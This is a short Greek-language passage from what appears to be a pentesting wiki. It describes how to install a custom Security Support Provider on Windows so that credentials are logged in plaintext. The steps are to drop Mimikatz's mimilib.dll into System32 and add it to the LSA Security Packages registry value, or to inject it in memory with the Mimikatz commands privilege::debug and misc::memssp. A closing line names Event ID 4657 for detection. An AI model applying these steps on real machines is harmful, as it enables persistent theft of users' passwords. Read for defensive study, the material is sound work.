Προσαρμοσμένο SSP

Μάθετε τι είναι ένα SSP (Security Support Provider) εδώ. Μπορείτε να δημιουργήσετε το δικό σας SSP για να καταγράψετε σε καθαρό κείμενο τα διαπιστευτήρια που χρησιμοποιούνται για την πρόσβαση στη μηχανή.

Mimilib

Μπορείτε να χρησιμοποιήσετε το δυαδικό αρχείο mimilib.dll που παρέχεται από το Mimikatz. Αυτό θα καταγράψει σε ένα αρχείο όλα τα διαπιστευτήρια σε καθαρό κείμενο. Αποθέστε το dll στο C:\Windows\System32\ Λάβετε μια λίστα υπαρκτών LSA Security Packages:

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Προσθέστε το mimilib.dll στη λίστα του παρόχου υποστήριξης ασφάλειας (Security Packages):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Και μετά από επανεκκίνηση, όλα τα διαπιστευτήρια μπορούν να βρεθούν σε καθαρό κείμενο στο C:\Windows\System32\kiwissp.log

Στη μνήμη

Μπορείτε επίσης να εισαγάγετε αυτό στη μνήμη απευθείας χρησιμοποιώντας το Mimikatz (προσέξτε ότι μπορεί να είναι λίγο ασταθές/να μην λειτουργεί):

privilege::debug
misc::memssp

Αυτό δεν θα επιβιώσει μετά την επανεκκίνηση.

Αντιμετώπιση

Event ID 4657 - Ελέγχου δημιουργίας/αλλαγής του HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages